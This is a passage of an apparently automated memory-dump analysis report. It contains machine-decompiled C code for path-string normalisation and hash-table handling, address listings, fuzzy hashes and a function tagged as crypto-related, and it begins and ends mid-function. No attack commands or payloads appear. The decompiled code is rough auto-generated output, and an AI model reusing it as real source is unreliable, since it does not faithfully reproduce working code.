														__eax = _v52 & 0x0000ffff;
														_v56 = __eax;
														__edx = _v88;
														__ebx = _v48;
														__eflags = __eax - 6;
														if(__eax >= 6) {
															__eax =  *(__edx + 4);
															__ax =  *((intOrPtr*)(__eax + 4));
															 *(__ebx + 4) =  *((intOrPtr*)(__eax + 4));
														}
														__eax = _v108;
														__eflags =  *_v108 - 7;
														if( *_v108 == 7) {
															_v57 = 0;
														}
														goto L25;
												}
											} else {
												_v80 = 3;
												L25:
												_t349 = _v104 + (_v72 & 0x0000ffff) - _t445 + _t445;
												_v104 = _t349;
												_t415 = _t349 + 2;
												if(_t415 > _v116) {
													if(_t435 <= 1) {
														if( *( *(_t425 + 4)) != 0x2e) {
															goto L72;
														}
														if(_t435 != 1) {
															asm("sbb esi, esi");
															_t446 =  !_t445 & _v104;
															_v64 = _t446;
															_t439 = _v92;
															L58:
															_t409 = _v84;
															L59:
															_v8 = 0xfffffffe;
															E0303746D(_t386, _t409, _t439, _t446);
															_t317 = _t446;
															L60:
															 *[fs:0x0] = _v20;
															_pop(_t436);
															_pop(_t444);
															_pop(_t387);
															return E0305B640(_t317, _t387, _v32 ^ _t453, _t425, _t436, _t444);
														}
														_t417 = _v72;
														if(_t417 != 8) {
															if(_v116 >= (_t417 & 0x0000ffff)) {
																_t352 = _v56;
																_t418 = _t352 & 0x0000ffff;
																_v104 = _t418;
																_t419 = _t418 >> 1;
																_v100 = _t419;
																if(_t419 != 0) {
																	if( *((short*)(_t386 + _t419 * 2 - 2)) == 0x5c) {
																		_t352 = _v104 + 0xfffffffe;
																		_v56 = _t352;
																		_v52 = _t352;
																	}
																}
																L27:
																_t420 = 0;
																_v100 = 0;
																L28:
																L28:
																if(_t420 < (_t352 & 0x0000ffff) >> 1) {
																	goto L69;
																} else {
																	_t422 = (_v56 & 0x0000ffff) >> 1;
																	_v96 = _t422;
																}
																while(_t445 < _t435) {
																	_t363 = ( *(_t425 + 4))[_t445] & 0x0000ffff;
																	if(_t363 == 0x5c) {
																		L44:
																		if(_t422 == 0) {
																			L46:
																			 *(_t386 + _t422 * 2) = 0x5c;
																			_t422 = _t422 + 1;
																			_v96 = _t422;
																			L43:
																			_t445 = _t445 + 1;
																			_v76 = _t445;
																			continue;
																		}
																		if( *((short*)(_t386 + _t422 * 2 - 2)) == 0x5c) {
																			goto L43;
																		}
																		goto L46;
																	}
																	_t365 = _t363 - 0x2e;
																	if(_t365 == 0) {
																		_t126 = _t445 + 1; // 0x2
																		_t366 = _t126;
																		_v104 = _t366;
																		if(_t366 == _t435) {
																			goto L43;
																		}
																		_t367 =  *(_t425 + 4);
																		_t440 =  *(_t367 + 2 + _t445 * 2) & 0x0000ffff;
																		_v108 = _t440;
																		_t435 = _v120;
																		if(_t440 != 0x5c) {
																			if(_v108 == 0x2f) {
																				goto L83;
																			}
																			if(_v108 != 0x2e) {
																				L35:
																				while(_t445 < _t435) {
																					_t369 = ( *(_t425 + 4))[_t445] & 0x0000ffff;
																					if(_t369 == 0x5c || _t369 == 0x2f) {
																						if(_t445 < _t435) {
																							if(_t422 >= 2) {
																								if( *((short*)(_t386 + _t422 * 2 - 2)) == 0x2e) {
																									if( *((short*)(_t386 + _t422 * 2 - 4)) != 0x2e) {
																										_t422 = _t422 - 1;
																										_v96 = _t422;
																									}
																								}
																							}
																						}
																						break;
																					} else {
																						 *(_t386 + _t422 * 2) = _t369;
																						_t422 = _t422 + 1;
																						_v96 = _t422;
																						_t445 = _t445 + 1;
																						_v76 = _t445;
																						continue;
																					}
																				}
																				_t445 = _t445 - 1;
																				_v76 = _t445;
																				goto L43;
																			}
																			_t155 = _t445 + 2; // 0x3
																			_t425 = _v88;
																			if(_t155 == _t435) {
																				while(1) {
																					L103:
																					if(_t422 < _v80) {
																						break;
																					}
																					 *(_t386 + _t422 * 2) = 0;
																					_t425 = _v88;
																					if( *(_t386 + _t422 * 2) != 0x5c) {
																						_t422 = _t422 - 1;
																						_v96 = _t422;
																						continue;
																					} else {
																						goto L105;
																					}
																					while(1) {
																						L105:
																						if(_t422 < _v80) {
																							goto L180;
																						}
																						 *(_t386 + _t422 * 2) = 0;
																						_t435 = _v120;
																						if( *(_t386 + _t422 * 2) == 0x5c) {
																							if(_t422 < _v80) {
																								goto L180;
																							}
																							L110:
																							_t445 = _t445 + 1;
																							_v76 = _t445;
																							goto L43;
																						}
																						_t422 = _t422 - 1;
																						_v96 = _t422;
																					}
																					break;
																				}
																				L180:
																				_t422 = _t422 + 1;
																				_v96 = _t422;
																				goto L110;
																			}
																			_t375 =  *(_t367 + 4 + _t445 * 2) & 0x0000ffff;
																			if(_t375 != 0x5c) {
																				if(_t375 != 0x2f) {
																					goto L35;
																				}
																			}
																			goto L103;
																		}
																		L83:
																		_t445 = _v104;
																		_v76 = _t445;
																		goto L43;
																	}
																	if(_t365 == 1) {
																		goto L44;
																	} else {
																		goto L35;
																	}
																}
																_t449 = _v80;
																if(_v57 != 0) {
																	if(_t422 > _t449) {
																		if( *((short*)(_t386 + _t422 * 2 - 2)) == 0x5c) {
																			_t422 = _t422 - 1;
																			_v96 = _t422;
																		}
																	}
																}
																_t439 = _v92;
																if(_t422 >= _v92) {
																	L52:
																	if(_t422 == 0) {
																		L56:
																		_t425 = _t422 + _t422;
																		_v52 = _t425;
																		if(_v112 != 0) {
																			_t357 = _t422;
																			while(1) {
																				_v100 = _t357;
																				if(_t357 == 0) {
																					break;
																				}
																				if( *((short*)(_t386 + _t357 * 2 - 2)) == 0x5c) {
																					break;
																				}
																				_t357 = _t357 - 1;
																			}
																			if(_t357 >= _t422) {
																				L113:
																				 *_v112 = 0;
																				goto L57;
																			}
																			if(_t357 < _t449) {
																				goto L113;
																			}
																			 *_v112 = _t386 + _t357 * 2;
																		}
																		L57:
																		_t446 = _t425 & 0x0000ffff;
																		_v64 = _t446;
																		goto L58;
																	}
																	_t422 = _t422 - 1;
																	_v96 = _t422;
																	_t360 =  *(_t386 + _t422 * 2) & 0x0000ffff;
																	if(_t360 == 0x20) {
																		goto L51;
																	}
																	if(_t360 == 0x2e) {
																		goto L51;
																	}
																	_t422 = _t422 + 1;
																	_v96 = _t422;
																	goto L56;
																} else {
																	L51:
																	 *(_t386 + _t422 * 2) = 0;
																	goto L52;
																}
																L69:
																if( *((short*)(_t386 + _t420 * 2)) == 0x2f) {
																	 *((short*)(_t386 + _t420 * 2)) = 0x5c;
																}
																_t420 = _t420 + 1;
																_v100 = _t420;
																_t352 = _v56;
																goto L28;
															}
															_t446 = _t417 & 0x0000ffff;
															_v64 = _t446;
															_t439 = _v92;
															goto L58;
														}
														if(_v116 > 8) {
															goto L26;
														}
														_t446 = 0xa;
														_v64 = 0xa;
														_t439 = _v92;
														goto L58;
													}
													L72:
													if(_t415 > 0xffff) {
														_t446 = 0;
													}
													_v64 = _t446;
													_t439 = _v92;
													goto L58;
												}
												L26:
												_t352 = _v56;
												goto L27;
											}
										}
										_t379 = _t336[2] & 0x0000ffff;
										if(_t379 != 0x5c) {
											if(_t379 == 0x2f) {
												goto L22;
											}
											goto L98;
										}
										L22:
										_t337 = 2;
									}
									goto L23;
								}
								_t450 =  *_t336 & 0x0000ffff;
								if(_t450 == 0x5c || _t450 == 0x2f) {
									if(_t407 < 4) {
										L132:
										_t337 = 4;
										goto L23;
									}
									_t451 = _t336[1] & 0x0000ffff;
									if(_t451 != 0x5c) {
										if(_t451 == 0x2f) {
											goto L87;
										}
										goto L132;
									}
									L87:
									if(_t407 < 6) {
										L135:
										_t337 = 1;
										goto L23;
									}
									_t452 = _t336[2] & 0x0000ffff;
									if(_t452 != 0x2e) {
										if(_t452 == 0x3f) {
											goto L89;
										}
										goto L135;
									}
									L89:
									if(_t407 < 8) {
										L134:
										_t337 = ((0 | _t407 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
										goto L23;
									}
									_t384 = _t336[3] & 0x0000ffff;
									if(_t384 != 0x5c) {
										if(_t384 == 0x2f) {
											goto L91;
										}
										goto L134;
									}
									L91:
									_t337 = 6;
									goto L23;
								} else {
									goto L17;
								}
							}
						}
					}
					goto L124;
				}
			}

0x03036e30
0x03036e35
0x03036e37
0x03036e3c
0x03036e47
0x03036e4b
0x03036e50
0x03036e53
0x03036e55
0x03036e5b
0x03036e5f
0x03036e65
0x03036e68
0x03036e6a
0x03036e6d
0x03036e70
0x03036e73
0x03036e76
0x03036e79
0x03036e7c
0x03036e7f
0x03036e84
0x0303710f
0x0303710f
0x03036e8c
0x03036e8e
0x03036e8e
0x03036e97
0x0307f5d3
0x0307f5d3
0x03036e9d
0x03036ea3
0x03036eaa
0x03036ead
0x03036eb2
0x03036eb4
0x03036eb7
0x03037466
0x03037466
0x00000000
0x03036ebd
0x03036ebd
0x03036ec4
0x03036eca
0x03036ecc
0x03036ecf
0x03036ed2
0x03036ede
0x0307f5df
0x0307f5e0
0x00000000
0x0307f5e0
0x03036ee6
0x00000000
0x00000000
0x03036eec
0x03036ef3
0x03037181
0x03036f02
0x03036f02
0x03036f02
0x03036f0b
0x03036f0d
0x03036f10
0x03036f17
0x03036f21
0x03036f24
0x03036f2d
0x03036f31
0x03036f36
0x03036f3d
0x03037413
0x03037416
0x03037419
0x0303741c
0x03037421
0x0303742b
0x0303742b
0x0303742e
0x03037439
0x0307f60b
0x0307f60b
0x0307f615
0x0307f619
0x0303743f
0x03037447
0x03037454
0x0303745a
0x0303745f
0x0303745f
0x00000000
0x03037439
0x03037425
0x0307f5e9
0x0307f5ed
0x0307f5f4
0x00000000
0x00000000
0x0307f5fd
0x00000000
0x00000000
0x0307f603
0x0307f603
0x00000000
0x03036f43
0x03036f43
0x03036f45
0x03036f48
0x03036f4e
0x03036f65
0x03036f68
0x0303721f
0x03036f83
0x03036f86
0x030372dc
0x030372dc
0x03036f9e
0x03036fa1
0x03036fa3
0x03036fa5
0x03036fa8
0x03036fab
0x03036fae
0x03036fb1
0x03036fb4
0x03036fb6
0x03036fb9
0x03036fbf
0x0303718a
0x0303718e
0x0307f831
0x0307f831
0x0307f833
0x0307f836
0x00000000
0x0307f836
0x03037194
0x00000000
0x0307f658
0x0307f658
0x0307f65a
0x0307f65d
0x0307f662
0x0307f662
0x0307f665
0x0307f667
0x00000000
0x00000000
0x0307f669
0x0307f66c
0x0307f670
0x0307f673
0x0307f67a
0x0307f67a
0x0307f67b
0x0307f67e
0x0307f681
0x00000000
0x00000000
0x0307f683
0x0307f683
0x00000000
0x0307f683
0x0307f675
0x0307f678
0x00000000
0x00000000
0x00000000
0x0307f678
0x0307f686
0x0307f688
0x0307f68b
0x0307f68e
0x0307f691
0x0307f694
0x0307f698
0x0307f69c
0x0307f6a0
0x00000000
0x00000000
0x00000000
0x00000000
0x03037397
0x0303739c
0x0303739f
0x030373a3
0x030373a5
0x0307f6bb
0x0307f6c1
0x0307f6c4
0x030373ab
0x030373ab
0x030373ab
0x030373b1
0x030373b5
0x030373ba
0x030373c0
0x030373c3
0x030373c7
0x030373cc
0x030373d0
0x030373d3
0x0307f6cc
0x0307f6d4
0x0307f6d9
0x0307f6dd
0x0307f6e1
0x0307f6e5
0x0307f6f0
0x0307f6fc
0x0307f700
0x0307f709
0x0307f70e
0x0307f710
0x0307f784
0x0307f788
0x0307f78b
0x0307f78e
0x0307f790
0x0307f792
0x0307f795
0x0307f798
0x0307f7b7
0x0307f7b7
0x0307f7ba
0x0307f7ba
0x00000000
0x0307f7ba
0x0307f79a
0x0307f79d
0x00000000
0x00000000
0x0307f79f
0x0307f7a4
0x0307f7a7
0x0307f7ab
0x0307f7ae
0x0307f7b1
0x00000000
0x0307f7b1
0x0307f712
0x0307f717
0x0307f74c
0x0307f74e
0x0307f752
0x0307f756
0x0307f75d
0x0307f761
0x0307f764
0x0307f76c
0x0307f771
0x0307f775
0x0307f778
0x0307f77c
0x00000000
0x0307f77c
0x0307f719
0x0307f71d
0x0307f720
0x0307f723
0x0307f726
0x0307f729
0x0307f72e
0x0307f740
0x0307f744
0x00000000
0x0307f744
0x0307f730
0x0307f732
0x0307f735
0x0307f738
0x00000000
0x030373d9
0x030373d9
0x030373db
0x030373de
0x030373e1
0x030373e4
0x030373e7
0x030373ea
0x030373ef
0x030373f2
0x030373f6
0x030373f9
0x030373f9
0x030373fe
0x03037401
0x03037406
0x03037409
0x00000000
0x03037409
0x00000000
0x0307f7c5
0x0307f7ca
0x0307f7cd
0x0307f7d1
0x0307f7d3
0x0307f7da
0x0307f7e0
0x0307f7e3
0x0307f7e3
0x0307f7e6
0x0307f7d5
0x0307f7d5
0x0307f7d5
0x0307f7e9
0x0307f7eb
0x0307f7f0
0x0307f7f3
0x0307f7f5
0x0307f7f8
0x0307f7fb
0x0307f7fe
0x0307f801
0x0307f80f
0x0307f814
0x0307f803
0x0307f803
0x0307f806
0x0307f806
0x00000000
0x00000000
0x0303719d
0x030371a2
0x030371a5
0x030371a9
0x030371ab
0x0307f826
0x0307f829
0x030371b1
0x030371b1
0x030371ba
0x030371ba
0x030371bf
0x030371c5
0x030371cf
0x030371d2
0x030371d8
0x030371dd
0x030371e4
0x030371e7
0x00000000
0x00000000
0x03037275
0x0303727a
0x0303727d
0x0303727f
0x03037282
0x03037284
0x0307f6a8
0x0307f6aa
0x0307f6aa
0x0303728a
0x0303728f
0x03037292
0x03037297
0x0303729a
0x0303729d
0x030372a0
0x030372a5
0x030372a9
0x030372ac
0x030372af
0x030372b2
0x030372b5
0x030372b7
0x030372ba
0x030372be
0x030372be
0x030372c2
0x030372c5
0x030372c8
0x0307f6b2
0x0307f6b2
0x00000000
0x00000000
0x03036fc5
0x03036fc5
0x03036fcc
0x03036fd8
0x03036fda
0x03036fdd
0x03036fe3
0x03037162
0x0307f845
0x00000000
0x00000000
0x0307f84e
0x0307f8c4
0x0307f8c8
0x0307f8cb
0x0307f8ce
0x030370e0
0x030370e0
0x030370e3
0x030370e3
0x030370ea
0x030370ef
0x030370f1
0x030370f4
0x030370fc
0x030370fd
0x030370fe
0x0303710c
0x0303710c
0x0307f850
0x0307f858
0x0307f87a
0x0307f88a
0x0307f88d
0x0307f890
0x0307f893
0x0307f895
0x0307f898
0x0307f8a4
0x0307f8ad
0x0307f8b0
0x0307f8b3
0x0307f8b3
0x0307f8a4
0x03036fec
0x03036fec
0x03036fee
0x00000000
0x03036ff1
0x03036ff8
0x00000000
0x03036ffe
0x03037004
0x03037006
0x03037006
0x03037010
0x03037017
0x0303701e
0x03037072
0x03037074
0x0303707e
0x03037083
0x03037087
0x03037088
0x0303706c
0x0303706c
0x0303706d
0x00000000
0x0303706d
0x0303707c
0x00000000
0x00000000
0x00000000
0x0303707c
0x03037020
0x03037023
0x030371ef
0x030371ef
0x030371f2
0x030371f7
0x00000000
0x00000000
0x030371fd
0x03037200
0x03037205
0x0303720b
0x0303720e
0x030372eb
0x00000000
0x00000000
0x030372f6
0x00000000
0x03037030
0x03037037
0x0303703e
0x03037055
0x0303705a
0x03037062
0x0307f908
0x0307f90e
0x0307f90f
0x0307f90f
0x0307f908
0x03037062
0x0303705a
0x00000000
0x03037045
0x03037045
0x03037049
0x0303704a
0x0303704d
0x0303704e
0x00000000
0x0303704e
0x0303703e
0x03037068
0x03037069
0x00000000
0x03037069
0x030372fc
0x03037301
0x03037304
0x03037314
0x03037314
0x03037319
0x00000000
0x00000000
0x03037325
0x0303732d
0x03037330
0x03037356
0x03037357
0x00000000
0x00000000
0x00000000
0x00000000
0x03037332
0x03037332
0x03037337
0x00000000
0x00000000
0x03037343
0x0303734b
0x0303734e
0x03037361
0x00000000
0x00000000
0x03037367
0x03037367
0x03037368
0x00000000
0x03037368
0x03037350
0x03037351
0x03037351
0x00000000
0x03037332
0x0307f8f9
0x0307f8f9
0x0307f8fa
0x00000000
0x0307f8fa
0x03037306
0x0303730e
0x0307f8ee
0x00000000
0x00000000
0x0307f8f4
0x00000000
0x0303730e
0x03037214
0x03037214
0x03037217
0x00000000
0x03037217
0x0303702c
0x00000000
0x00000000
0x00000000
0x00000000
0x0303702c
0x0303708d
0x03037094
0x03037098
0x030370a0
0x0303738c
0x0303738d
0x0303738d
0x030370a0
0x03037098
0x030370a6
0x030370ab
0x030370b3
0x030370b5
0x030370cd
0x030370cd
0x030370d0
0x030370d8
0x0303711a
0x0303711c
0x0303711c
0x03037121
0x00000000
0x00000000
0x03037129
0x00000000
0x00000000
0x0303712b
0x0303712b
0x03037130
0x0303737e
0x03037381
0x00000000
0x03037381
0x03037138
0x00000000
0x00000000
0x03037144
0x03037144
0x030370da
0x030370da
0x030370dd
0x00000000
0x030370dd
0x030370b7
0x030370b8
0x030370bb
0x030370c2
0x00000000
0x00000000
0x030370c7
0x00000000
0x00000000
0x030370c9
0x030370ca
0x00000000
0x030370ad
0x030370ad
0x030370af
0x00000000
0x030370af
0x03037148
0x0303714d
0x0307f8e2
0x0307f8e2
0x03037153
0x03037154
0x03037157
0x00000000
0x03037157
0x0307f87c
0x0307f87f
0x0307f882
0x00000000
0x0307f882
0x0307f85e
0x00000000
0x00000000
0x0307f864
0x0307f869
0x0307f86c
0x00000000
0x0307f86c
0x03037168
0x03037170
0x0307f8d6
0x0307f8d6
0x03037176
0x03037179
0x00000000
0x03037179
0x03036fe9
0x03036fe9
0x00000000
0x03036fe9
0x03036fbf
0x03036f8c
0x03036f93
0x030372d6
0x00000000
0x00000000
0x00000000
0x030372d6
0x03036f99
0x03036f99
0x03036f99
0x00000000
0x03036f68
0x03036f50
0x03036f56
0x0303722c
0x0307f629
0x0307f629
0x00000000
0x0307f629
0x03037232
0x03037239
0x0307f623
0x00000000
0x00000000
0x00000000
0x0307f623
0x0303723f
0x03037242
0x0307f64e
0x0307f64e
0x00000000
0x0307f64e
0x03037248
0x0303724f
0x03037373
0x00000000
0x00000000
0x00000000
0x03037379
0x03037255
0x03037258
0x0307f63c
0x0307f648
0x00000000
0x0307f648
0x0303725e
0x03037265
0x0307f636
0x00000000
0x00000000
0x00000000
0x0307f636
0x0303726b
0x0303726b
0x00000000
0x00000000
0x00000000
0x00000000
0x03036f56
0x03036f3d
0x03036ed2
0x00000000
0x03036ec4

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45da8415b5eb03a882ec28e85ed9b09a317c70f1081b2a9c6ece974b7ec3d50d
Instruction ID: 344585d43e50231b13e997b131ff925b3c0a02ce461ca95ca03cc126501f9bf5
Opcode Fuzzy Hash: 45da8415b5eb03a882ec28e85ed9b09a317c70f1081b2a9c6ece974b7ec3d50d
Instruction Fuzzy Hash: 91028FB1D06219DFCB68CF98C4806ADF7F9FF46B00F69442EE856AB250E7709891CB45

Uniqueness

Uniqueness Score: -1.00%

Function 030EDFCE, Relevance: .5, Instructions: 458
COMMONCrypto

Download Yara Rule

C-Code - Quality: 68%

			E030EDFCE(intOrPtr __ecx, signed int __edx, signed int _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed char _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed int _v52;
				signed int _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t173;
				signed int _t175;
				unsigned int _t177;
				intOrPtr _t178;
				signed int _t201;
				unsigned int _t223;
				unsigned int _t240;
				signed int _t258;
				intOrPtr _t269;
				signed int _t270;
				signed char _t271;
				signed char _t273;
				signed int _t274;
				intOrPtr* _t281;
				signed int* _t284;
				signed char _t292;
				signed int _t293;
				signed char _t300;
				signed char _t305;
				intOrPtr _t314;
				signed int _t315;
				signed int _t319;
				signed int _t323;
				intOrPtr _t326;
				signed char _t328;
				signed int _t334;
				signed char _t335;
				void* _t365;
				signed int _t368;
				signed int* _t373;
				signed int _t377;
				signed int _t378;
				signed int _t381;
				signed int _t382;
				signed int _t383;
				unsigned int _t384;
				void* _t385;
				void* _t386;
				void* _t387;
				void* _t388;
				void* _t389;
				void* _t390;
				signed int _t393;
				signed int _t406;
				signed int _t407;

				_t367 = __edx;
				_v8 =  *0x310d360 ^ _t407;
				_t269 = __ecx;
				_v44 = __ecx;
				if(__ecx == 0) {
					L80:
					_t270 = 0;
					L81:
					return E0305B640(_t270, _t270, _v8 ^ _t407, _t367, _t383, _t392);
				}
				_t383 = _a4;
				if(_t383 == 0 || __edx == 0) {
					goto L80;
				} else {
					_v56 = _t383;
					_t393 = 0x4cb2f;
					_t384 = _t383 << 2;
					_v52 = __edx;
					if(_t384 < 8) {
						L7:
						_t385 = _t384 - 1;
						if(_t385 == 0) {
							L20:
							_t392 = _t393 * 0x25 + ( *_t367 & 0x000000ff);
							L21:
							_t15 = _t269 + 0x18; // 0x3108680
							_v48 = _t15;
							L0303FAD0(_t15);
							_t17 = _t269 + 0xc; // 0x3108674
							_t367 = _t17;
							_t383 = 0;
							_v20 = _t367;
							_t271 = 0;
							while(1) {
								L22:
								_t19 = _t367 + 4; // 0x0
								_t173 =  *_t19;
								_v12 = _v12 | 0xffffffff;
								_v12 = _v12 << (_t173 & 0x0000001f);
								_t300 = _t392 & _v12;
								_v16 = _t300;
								_v16 = _v16 >> 0x18;
								_v28 = _t300;
								_v28 = _v28 >> 0x10;
								_v24 = _t300;
								_v24 = _v24 >> 8;
								_v32 = _t300;
								if(_t271 != 0) {
									goto L25;
								}
								_t240 = _t173 >> 5;
								_v36 = _t240;
								if(_t240 == 0) {
									_t270 = _t383;
									L34:
									if(_t270 == 0) {
										L38:
										_t272 = _v48;
										E0303FA00(_v48, _t300, _t383, _v48);
										_t367 =  &_v56;
										_t175 = E030EE62A(_v44,  &_v56, _t392);
										_v36 = _t175;
										if(_t175 != 0) {
											E03032280(_t175, _t272);
											_t273 = _t383;
											do {
												_t368 = _v20;
												_v12 = _v12 | 0xffffffff;
												_t177 =  *(_t368 + 4);
												_v12 = _v12 << (_t177 & 0x0000001f);
												_t305 = _v12 & _t392;
												_v24 = _t305;
												_v24 = _v24 >> 0x18;
												_v28 = _t305;
												_v28 = _v28 >> 0x10;
												_v16 = _t305;
												_v16 = _v16 >> 8;
												_v40 = _t305;
												if(_t273 != 0) {
													while(1) {
														L44:
														_t273 =  *_t273;
														if((_t273 & 0x00000001) != 0) {
															break;
														}
														if(_t305 == ( *(_t273 + 4) & _v12)) {
															L48:
															if(_t273 == 0) {
																L55:
																_t178 = _v44;
																_t274 =  *(_t368 + 4);
																_v16 =  *((intOrPtr*)(_t178 + 0x28));
																_v32 =  *(_t178 + 0x20);
																_t181 = _t274 >> 5;
																_v24 =  *((intOrPtr*)(_t178 + 0x24));
																if( *_t368 < (_t274 >> 5) + (_t274 >> 5)) {
																	L76:
																	_t383 = _v36;
																	_t153 = (_t274 >> 5) - 1; // 0xffffffdf
																	_t367 = _t153 & (((_t274 & 0x0000001f | 0xffffffff) << (_t274 & 0x0000001f) &  *(_t383 + 4)) >> 0x00000018) + ((((_t274 & 0x0000001f | 0xffffffff) << (_t274 & 0x0000001f) &  *(_t383 + 4)) >> 0x00000010 & 0x000000ff) + ((((_t274 & 0x0000001f | 0xffffffff) << (_t274 & 0x0000001f) &  *(_t383 + 4)) >> 0x00000008 & 0x000000ff) + (((_t274 & 0x0000001f | 0xffffffff) << (_t274 & 0x0000001f) &  *(_t383 + 4) & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
																	_t281 = _v20;
																	_t314 =  *((intOrPtr*)(_t281 + 8));
																	 *_t383 =  *(_t314 + _t367 * 4);
																	 *(_t314 + _t367 * 4) = _t383;
																	 *_t281 =  *_t281 + 1;
																	E0302FFB0(_t281, _t383, _v48);
																	goto L39;
																}
																_t315 = 2;
																if(E0304F3D5( &_v40, _t181 * _t315, _t181 * _t315 >> 0x20) < 0) {
																	goto L76;
																}
																_t392 = _v40;
																if(_t392 < 4) {
																	_t392 = 4;
																}
																 *0x310b1e0(_t392 << 2, _v16);
																_t373 =  *_v32();
																_v12 = _t373;
																if(_t373 == 0) {
																	_t274 =  *(_v20 + 4);
																	if(_t274 >= 0x20) {
																		goto L76;
																	}
																	L78:
																	_t270 = _t383;
																	L79:
																	E0302FFB0(_t270, _t383, _v48);
																	_t367 = _v36;
																	E030EE5B6(_v44, _v36);
																	goto L81;
																} else {
																	_t107 = _t392 - 1; // 0x3
																	_t319 = _t107;
																	if((_t392 & _t319) == 0) {
																		L64:
																		if(_t392 > 0x4000000) {
																			_t392 = 0x4000000;
																		}
																		_t284 = _t373;
																		_t201 = _v20 | 0x00000001;
																		asm("sbb ecx, ecx");
																		_t323 =  !(_v12 + (_t392 << 2)) & _t392 << 0x00000002 >> 0x00000002;
																		if(_t323 <= 0) {
																			L69:
																			_t377 = _v20;
																			_v40 = (_t201 | 0xffffffff) << ( *(_t377 + 4) & 0x0000001f);
																			if(( *(_t377 + 4) & 0xffffffe0) <= 0) {
																				L74:
																				_t326 =  *((intOrPtr*)(_t377 + 8));
																				_t274 =  *(_t377 + 4) & 0x0000001f | _t392 << 0x00000005;
																				 *((intOrPtr*)(_t377 + 8)) = _v12;
																				 *(_t377 + 4) = _t274;
																				if(_t326 != 0) {
																					 *0x310b1e0(_t326, _v16);
																					 *_v24();
																					_t274 =  *(_v20 + 4);
																				}
																				goto L76;
																			} else {
																				goto L70;
																			}
																			do {
																				L70:
																				_t378 =  *((intOrPtr*)(_t377 + 8));
																				_v28 = _t378;
																				while(1) {
																					_t328 =  *(_t378 + _t383 * 4);
																					_v32 = _t328;
																					if((_t328 & 0x00000001) != 0) {
																						goto L73;
																					}
																					 *(_t378 + _t383 * 4) =  *_t328;
																					_t381 = _v12;
																					_t132 = _t392 - 1; // -1
																					_t334 = _t132 & (( *(_t328 + 4) & _v40) >> 0x00000018) + ((( *(_t328 + 4) & _v40) >> 0x00000010 & 0x000000ff) + ((( *(_t328 + 4) & _v40) >> 0x00000008 & 0x000000ff) + (( *(_t328 + 4) & _v40 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
																					_t292 = _v32;
																					 *_t292 =  *(_t381 + _t334 * 4);
																					 *(_t381 + _t334 * 4) = _t292;
																					_t378 = _v28;
																				}
																				L73:
																				_t377 = _v20;
																				_t383 = _t383 + 1;
																			} while (_t383 <  *(_t377 + 4) >> 5);
																			goto L74;
																		} else {
																			_t382 = _t383;
																			do {
																				_t382 = _t382 + 1;
																				 *_t284 = _t201;
																				_t284 =  &(_t284[1]);
																			} while (_t382 < _t323);
																			goto L69;
																		}
																	}
																	_t335 = _t319 | 0xffffffff;
																	if(_t392 == 0) {
																		L63:
																		_t392 = 1 << _t335;
																		goto L64;
																	} else {
																		goto L62;
																	}
																	do {
																		L62:
																		_t335 = _t335 + 1;
																		_t392 = _t392 >> 1;
																	} while (_t392 != 0);
																	goto L63;
																}
															}
															goto L49;
														}
													}
													_t273 = _t383;
													goto L48;
												}
												_t223 = _t177 >> 5;
												_v32 = _t223;
												if(_t223 == 0) {
													_t273 = _t383;
													L51:
													if(_t273 == 0) {
														goto L55;
													}
													_t88 = _t273 + 8; // 0x8
													if(E030EE7A8(_t88) != 0) {
														goto L79;
													}
													goto L78;
												}
												_t273 =  *((intOrPtr*)(_t368 + 8)) + (_v32 - 0x00000001 & (_v24 & 0x000000ff) + 0x164b2f3f + (((_t305 & 0x000000ff) * 0x00000025 + (_v16 & 0x000000ff)) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025) * 4;
												_t305 = _v40;
												goto L44;
												L49:
											} while (E030EEE71(_t273,  &_v56) == 0);
											_t368 = _v20;
											goto L51;
										}
										L39:
										_t270 = _t383;
										goto L81;
									}
									_t50 = _t270 + 8; // 0x8
									_t345 = _t50;
									if(E030EE7A8(_t50) == 0) {
										_t270 = _t383;
									}
									E0303FA00(_t270, _t345, _t383, _v48);
									goto L81;
								}
								_t40 = _t367 + 8; // 0x0
								_t271 =  *_t40 + (_v36 - 0x00000001 & (_v16 & 0x000000ff) + 0x164b2f3f + (((_t300 & 0x000000ff) * 0x00000025 + (_v24 & 0x000000ff)) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025) * 4;
								_t300 = _v32;
								L25:
								_t367 = _v12;
								while(1) {
									_t271 =  *_t271;
									if((_t271 & 0x00000001) != 0) {
										break;
									}
									if(_t300 == ( *(_t271 + 4) & _t367)) {
										L30:
										if(_t270 == 0) {
											goto L38;
										}
										if(E030EEE71(_t270,  &_v56) != 0) {
											goto L34;
										}
										_t367 = _v20;
										goto L22;
									}
								}
								_t270 = _t383;
								goto L30;
							}
						}
						_t386 = _t385 - 1;
						if(_t386 == 0) {
							L19:
							_t393 = _t393 * 0x25 + ( *_t367 & 0x000000ff);
							_t367 = _t367 + 1;
							goto L20;
						}
						_t387 = _t386 - 1;
						if(_t387 == 0) {
							L18:
							_t393 = _t393 * 0x25 + ( *_t367 & 0x000000ff);
							_t367 = _t367 + 1;
							goto L19;
						}
						_t388 = _t387 - 1;
						if(_t388 == 0) {
							L17:
							_t393 = _t393 * 0x25 + ( *_t367 & 0x000000ff);
							_t367 = _t367 + 1;
							goto L18;
						}
						_t389 = _t388 - 1;
						if(_t389 == 0) {
							L16:
							_t393 = _t393 * 0x25 + ( *_t367 & 0x000000ff);
							_t367 = _t367 + 1;
							goto L17;
						}
						_t390 = _t389 - 1;
						if(_t390 == 0) {
							L15:
							_t393 = _t393 * 0x25 + ( *_t367 & 0x000000ff);
							_t367 = _t367 + 1;
							goto L16;
						}
						if(_t390 != 1) {
							goto L21;
						}
						_t393 = _t393 * 0x25 + ( *_t367 & 0x000000ff);
						_t367 = _t367 + 1;
						goto L15;
					}
					_t258 = _t384 >> 3;
					_v36 = _t258;
					_t293 = _t258;
